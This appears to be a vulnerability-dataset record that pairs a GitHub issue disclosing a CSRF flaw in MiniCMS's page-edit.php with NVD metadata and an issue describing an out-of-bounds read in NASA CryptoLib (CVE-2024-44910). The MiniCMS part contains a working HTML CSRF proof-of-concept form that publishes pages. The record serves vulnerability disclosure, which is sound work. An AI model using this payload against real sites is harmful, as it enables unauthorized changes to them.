# Vendor of Product https://github.com/bg5sbk/MiniCMS # Vulnerability Type CSRF # Vulnerable File page-edit.php # Affected Product Code Base <v1.11 # POC ``` <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://www.minicms.com/mc-admin/page-edit.php" method="POST"> <input type="hidden" name="&#95;IS&#95;POST&#95;BACK&#95;" value="" /> <input type="hidden" name="title" value="hello" /> <input type="hidden" name="content" value="hello" /> <input type="hidden" name="path" value="&#47;hello" /> <input type="hidden" name="year" value="" /> <input type="hidden" name="month" value="" /> <input type="hidden" name="day" value="" /> <input type="hidden" name="hourse" value="" /> <input type="hidden" name="minute" value="" /> <input type="hidden" name="second" value="" /> <input type="hidden" name="can&#95;comment" value="1" /> <input type="hidden" name="state" value="publish" /> <input type="hidden" name="file" value="" /> <input type="hidden" name="save" value="ä&#191;&#157;å&#173;&#152;" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` # Vulnerability reproduction - After the installation is complete, log in as administrator. - Save poc as HTML file ![image](https://github.com/user-attachments/assets/d6730099-0092-4e4b-879a-046d208d7b71) - Accessing this HTML file in a browser ,click "Submit request" ![image](https://github.com/user-attachments/assets/bb8fb5b8-8543-4bac-83c0-fbbb675e5196) - Successful exploitation of vulnerabilities ![image](https://github.com/user-attachments/assets/8fc5b72d-40c1-4e8a-961a-857b2e15b4e8)
There is another CSRF vulnerabilities in page-edit.php that can lead to add page
https://api.github.com/repos/bg5sbk/MiniCMS/issues/52/comments
0
2024-09-19T08:16:07Z
2024-09-19T08:16:07Z
https://github.com/bg5sbk/MiniCMS/issues/52
2,535,621,425
52
6,296
CVE-2024-44910
2024-09-27T15:15:14.907
NASA CryptoLib v1.3.0 was discovered to contain an Out-of-Bounds read via the AOS subsystem (crypto_aos.c).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/nasa/CryptoLib/issues/268" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Technical Description" ], "url": "https://visionspace.com/crashing-cryptolib/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nasa:cryptolib:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "D7F7FD1A-BA84-49EB-8B0C-10D72AF81E9C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/nasa/CryptoLib/issues/268
[ "Issue Tracking" ]
github.com
[ "nasa", "CryptoLib" ]
It is possible to get a seg fault by first passing an invalid index to `sa_if->sa_get_from_spi(spi, &sa_ptr)`, then dereferencing the pointer in the `// Determine SA Service Type` code blocks in `crypto_aos.c`, `crypto_tc.c`, and `crypto_tm.c`. To fix this, check if the SPI is within the SA array length before retrieving the SA pointer in `get_sa_from_spi()`
Out-of-Bounds reads on TM/TC/AOS Frames
https://api.github.com/repos/nasa/CryptoLib/issues/268/comments
0
2024-08-05T12:50:24Z
2024-08-07T18:35:34Z
https://github.com/nasa/CryptoLib/issues/268
2,448,479,893
268
6,297